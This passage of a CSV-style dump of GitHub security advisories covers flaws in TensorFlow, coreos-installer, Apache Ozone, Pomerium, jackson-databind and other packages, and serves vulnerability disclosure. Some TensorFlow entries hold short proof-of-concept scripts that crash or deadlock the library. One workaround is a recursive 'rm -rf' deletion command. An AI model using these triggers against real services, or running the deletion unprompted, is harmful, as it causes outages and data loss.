{'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3rcw-9p9x-582v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41228'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:43:17Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-862g-9h5m-m3qv,2022-09-08T14:25:48Z,2021-11-08T18:01:13Z,,['CVE-2021-3917'],coreos-installer < 0.10.0 writes world-readable Ignition config to installed system,"### Impact +On systems installed with coreos-installer before 0.10.0, the user-provided Ignition config was written to `/boot/ignition/config.ign` with world-readable permissions, granting unprivileged users access to any secrets included in the config. + +Default configurations of Fedora CoreOS and RHEL CoreOS do not include any unprivileged user accounts. In addition, instances launched from a cloud image, and systems provisioned with the `ignition.config.url` kernel argument, do not use the `config.ign` file and are unaffected. + +### Patches +coreos-installer 0.10.0 and later [writes](https://github.com/coreos/coreos-installer/pull/571) the Ignition config with restricted permissions. + +### Workarounds + +On Fedora CoreOS systems installed from version 34.20210711.3.0 (stable), 34.20210711.2.0 (testing), 34.20210711.1.1 (next) and later, the `/boot/ignition` directory and its contents are removed after provisioning is complete. All Fedora CoreOS systems that have updated to these versions or later have automatically removed the `/boot/ignition` directory and no action is required. + +On other systems, `/boot/ignition/config.ign` can be removed manually, as it is not used after provisioning is complete: + +``` +sudo mount -o remount,rw /boot +sudo rm -rf /boot/ignition +``` + +### References +For more information, see https://github.com/coreos/fedora-coreos-tracker/issues/889. + +### For more information +If you have any questions or comments about this advisory, [open an issue in coreos-installer](https://github.com/coreos/coreos-installer/issues/new/choose) or email the CoreOS [development mailing list](https://lists.fedoraproject.org/archives/list/coreos@lists.fedoraproject.org/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'coreos-installer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/security/advisories/GHSA-862g-9h5m-m3qv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3917'}, {'type': 'WEB', 'url': 'https://github.com/coreos/fedora-coreos-tracker/issues/889'}, {'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/commit/2a36405339c87b16ed6c76e91ad5b76638fbdb0c'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2021-3917'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2018478'}, {'type': 'PACKAGE', 'url': 'https://github.com/coreos/coreos-installer/'}, {'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/releases/tag/v0.10.0'}]","{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:11:09Z', 'nvd_published_at': '2022-08-23T20:15:00Z'}" +1.4.0,GHSA-rhf5-f553-xg82,2021-11-22T18:22:30Z,2021-11-23T18:18:16Z,,['CVE-2021-22951'],Password exposure in concrete5/core,"Unauthorized individuals could view password protected files using view_inline in Concrete CMS (previously concrete 5) prior to version 8.5.7. Concrete CMS now checks to see if a file has a password in view_inline and, if it does, the file is not rendered.For version 8.5.6, the following mitigations were put in place a. restricting file types for view_inline to images only b. putting a warning in the file manager to advise users.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22951'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1102014'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}]","{'cwe_ids': ['CWE-200', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:21:13Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}" +1.4.0,GHSA-9crf-c6qr-r273,2021-11-08T22:10:39Z,2021-11-10T18:52:24Z,,['CVE-2021-41218'],Integer division by 0 in `tf.raw_ops.AllToAll`,"### Impact +The [shape inference code for `AllToAll`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/tpu_cross_replica_ops.cc#L25-L74) can be made to execute a division by 0: + +```python +import tensorflow as tf + +@tf.function +def func(): + return tf.raw_ops.AllToAll( + input=[0.0, 0.1652, 0.6543], + group_assignment=[1, -1], + concat_dimension=0, + split_dimension=0, + split_count=0) + +func() +``` + +This occurs whenever the `split_count` argument is 0: + +```cc +TF_RETURN_IF_ERROR(c->GetAttr(""split_count"", &split_count)); +... +for (int32_t i = 0; i < rank; ++i) { + ... + dims[i] = c->MakeDim(c->Value(dims[i]) / split_count); + ... +} +``` + +### Patches +We have patched the issue in GitHub commit [a8ad3e5e79c75f36edb81e0ba3f3c0c5442aeddc](https://github.com/tensorflow/tensorflow/commit/a8ad3e5e79c75f36edb81e0ba3f3c0c5442aeddc). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9crf-c6qr-r273'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41218'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a8ad3e5e79c75f36edb81e0ba3f3c0c5442aeddc'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:10:39Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}" +1.4.0,GHSA-q5mq-6fjg-4mw8,2021-11-19T20:42:27Z,2021-11-19T20:42:32Z,,['CVE-2020-21176'],SQL Injection in thinkjs,SQL injection vulnerability in the model.increment and model.decrement function in ThinkJS 3.2.10 allows remote attackers to execute arbitrary SQL commands via the step parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'thinkjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21176'}, {'type': 'WEB', 'url': 'https://blog.jiguang.xyz/posts/thinkjs-sql-injection/'}, {'type': 'PACKAGE', 'url': 'https://github.com/thinkjs/thinkjs'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T13:12:49Z', 'nvd_published_at': '2021-02-01T18:15:00Z'}" +1.4.0,GHSA-5993-wwpg-m92c,2023-09-25T11:02:40Z,2021-11-23T17:56:45Z,,['CVE-2021-39236'],Apache Ozone user impersonation due to non-validation of Ozone S3 tokens,"In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.hadoop:hadoop-ozone-ozone-manager'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39236'}, {'type': 'WEB', 'url': 'https://github.com/apache/ozone/pull/1871'}, {'type': 'WEB', 'url': 'https://github.com/apache/ozone/commit/60e078729e18ef1be276f35659957ac553d266f7'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/HDDS-4763'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/q0lhspolnwfbsw33w98b7b1923n1np4d'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/7'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:05:30Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}" +1.4.0,GHSA-43g8-79x3-j898,2021-11-17T21:24:11Z,2021-11-15T17:36:22Z,,['CVE-2021-43564'],Unrestricted access to predictable file paths in hov/jobfair,"An issue was discovered in the jobfair (aka Job Fair) extension before 1.0.13 and 2.x before 2.0.2 for TYPO3. The extension fails to protect or obfuscate filenames of uploaded files. This allows unauthenticated users to download files with sensitive data by simply guessing the filename of uploaded files (e.g., uploads/tx_jobfair/cv.pdf).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'hov/jobfair'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'hov/jobfair'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43564'}, {'type': 'PACKAGE', 'url': 'https://github.com/nhovratov/jobfair'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-018'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T19:39:33Z', 'nvd_published_at': '2021-11-10T16:15:00Z'}" +1.4.0,GHSA-9wx7-jrvc-28mm,2021-11-08T21:34:42Z,2021-11-08T21:51:18Z,,[],Signature verification vulnerability in Stark Bank ecdsa libraries,"An attacker can forge signatures on arbitrary messages that will verify for any public key. This may allow attackers to authenticate as any user within the Stark Bank platform, and bypass signature verification needed to perform operations on the platform, such as send payments and transfer funds. Additionally, the ability for attackers to forge signatures may impact other users and projects using these libraries in different and unforeseen ways.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.starkbank:ecdsa-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.1'}]}], 'versions': ['1.0.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.1'}, {'fixed': '1.3.2'}]}], 'versions': ['1.3.1']}, {'package': {'ecosystem': 'npm', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.2'}, {'fixed': '1.1.3'}]}], 'versions': ['1.1.2']}]","[{'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/commit/d136170666e9510eb63c2572551805807bd4c17f'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-dotnet'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-java'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-node'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-python'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/compare/v2.0.0...v2.0.1'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/releases/tag/v2.0.1'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:34:42Z', 'nvd_published_at': None}" +1.4.0,GHSA-vhfp-9wvj-gwvg,2021-11-03T14:51:31Z,2021-11-01T19:19:43Z,,['CVE-2020-25911'],XML External Entity vulnerability in MODX CMS,A XML External Entity (XXE) vulnerability was discovered in the modRestServiceRequest component in MODX CMS 2.7.3 which can lead to an information disclosure or denial of service (DOS).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'modx/revolution'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25911'}, {'type': 'WEB', 'url': 'https://github.com/modxcms/revolution/issues/15237'}, {'type': 'WEB', 'url': 'https://github.com/modxcms/revolution/pull/15238'}, {'type': 'WEB', 'url': 'https://github.com/modxcms/revolution/pull/15238/commits/1b7ffe02df30f05dbf67dd15e4d8101687c1585a'}, {'type': 'WEB', 'url': 'https://github.com/dahua966/Vul_disclose/blob/main/XXE_modxcms.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/modxcms/revolution'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:08:06Z', 'nvd_published_at': '2021-10-31T19:15:00Z'}" +1.4.0,GHSA-c6j7-4fr9-c76p,2021-11-22T18:37:43Z,2021-11-23T18:17:41Z,,['CVE-2021-39235'],Incorrect permissions in Apache Ozone,"In Apache Ozone before 1.2.0, Ozone Datanode doesn't check the access mode parameter of the block token. Authenticated users with valid READ block token can do any write operation on the same block.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39235'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C93f88246-4320-7423-0dac-ec7a07f47455%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/6'}]","{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:37:43Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}" +1.4.0,GHSA-j6wp-3859-vxfg,2021-11-08T21:37:07Z,2021-11-10T16:52:24Z,,['CVE-2021-41230'],OIDC claims not updated from Identity Provider in Pomerium,"### Impact +Changes to the OIDC claims of a user after initial login are not reflected in policy evaluation when using [`allowed_idp_claims`](https://www.pomerium.com/reference/#allowed-idp-claims) as part of policy. If using `allowed_idp_claims` and a user's claims are changed, Pomerium can make incorrect authorization decisions. + +### Patches +v0.15.6 + +### Workarounds +- Clear data on `databroker` service by clearing redis or restarting the in-memory databroker to force claims to be updated + +### References +https://github.com/pomerium/pomerium/pull/2724 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Pomerium](https://github.com/pomerium/pomerium) +* Email us at [security@pomerium.com](mailto:security@pomerium.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.15.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/security/advisories/GHSA-j6wp-3859-vxfg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41230'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/pull/2724'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/commit/f20542c4bf2cc691e4c324f7ec79e02e46d95511'}, {'type': 'PACKAGE', 'url': 'https://github.com/pomerium/pomerium'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0258'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:37:07Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-h67m-xg8f-fxcf,2021-11-08T22:25:35Z,2021-11-10T18:59:32Z,,['CVE-2021-41213'],Deadlock in mutually recursive `tf.function` objects,"### Impact +The [code behind `tf.function` API](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/python/eager/def_function.py#L542) can be made to deadlock when two `tf.function` decorated Python functions are mutually recursive: + +```python +import tensorflow as tf + +@tf.function() +def fun1(num): + if num == 1: + return + print(num) + fun2(num-1) + +@tf.function() +def fun2(num): + if num == 0: + return + print(num) + fun1(num-1) + +fun1(9) +``` + +This occurs due to using a non-reentrant `Lock` Python object. + +Loading any model which contains mutually recursive functions is vulnerable. An attacker can cause denial of service by causing users to load such models and calling a recursive `tf.function`, although this is not a frequent scenario. + +### Patches +We have patched the issue in GitHub commit [afac8158d43691661ad083f6dd9e56f327c1dcb7](https://github.com/tensorflow/tensorflow/commit/afac8158d43691661ad083f6dd9e56f327c1dcb7). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h67m-xg8f-fxcf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41213'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/afac8158d43691661ad083f6dd9e56f327c1dcb7'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-662', 'CWE-667'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:25:35Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-v585-23hc-c647,2023-09-14T15:59:32Z,2021-11-19T20:13:06Z,,['CVE-2020-36186'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36186'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2997'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:16:26Z', 'nvd_published_at': '2021-01-06T23:15:00Z'}" +1.4.0,GHSA-rrc9-gqf8-8rwg,2021-04-06T20:37:10Z,2021-11-16T21:26:43Z,,['CVE-2020-28472'],Prototype Pollution via file load in aws-sdk and @aws-sdk/shared-ini-file-loader,"This affects the package @aws-sdk/shared-ini-file-loader before 1.0.0-rc.9; the package aws-sdk before 2.814.0. If an attacker submits a malicious INI file to an application that parses it with loadSharedConfigFiles , they will pollute the prototype on the application. This can be exploited further depending on the context.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'aws-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.814.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-sdk/shared-ini-file-loader'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-rc.8'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28472'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-sdk-js/pull/3585/commits/7d72aff2a941173733fcb6741b104cd83d3bc611'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-sdk-js-v3/commit/a209082dff913939672bb069964b33aa4c5409a9'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1059426'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1059425'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-AWSSDK-1059424'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-AWSSDKSHAREDINIFILELOADER-1049304'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T20:37:10Z', 'nvd_published_at': '2021-01-19T11:15:00Z'}" +1.4.0,GHSA-prcg-wp5q-rv7p,2021-11-08T22:54:14Z,2021-11-10T19:35:35Z,,['CVE-2021-41197'],Crashes due to overflow and `CHECK`-fail in ops with large tensor shapes,"### Impact +TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an `int64_t`. If an overflow occurs, `MultiplyWithoutOverflow` would return a negative result. In the majority of TensorFlow codebase this then results in a `CHECK`-failure. Newer constructs exist which return a `Status` instead of crashing the binary. + +For example [`AddDim`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/framework/tensor_shape.cc#L395-L408) calls should be replaced by [`AddDimWithStatus`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/framework/tensor_shape.cc#L410-L440). + +This is similar to [CVE-2021-29584](https://github.com/tensorflow/tensorflow/blob/3a74f0307236fe206b046689c4d76f57c9b74eee/tensorflow/security/advisory/tfsa-2021-071.md) (and similar other reported vulnerabilities in TensorFlow, localized to specific APIs). + +### Patches +We have patched the issue in GitHub commits [7c1692bd417eb4f9b33ead749a41166d6080af85](https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85) (merging [#51732](https://github.com/tensorflow/tensorflow/pull/51732)), [d81b1351da3e8c884ff836b64458d94e4a157c15](https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15) (merging [#51717](https://github.com/tensorflow/tensorflow/pull/51717)), [a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf](https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf) (merging [#51658](https://github.com/tensorflow/tensorflow/pull/51658)), and [d81b1351da3e8c884ff836b64458d94e4a157c15](https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15) (merging [#51973](https://github.com/tensorflow/tensorflow/pull/51973)). It is possible that other similar instances exist in TensorFlow, we 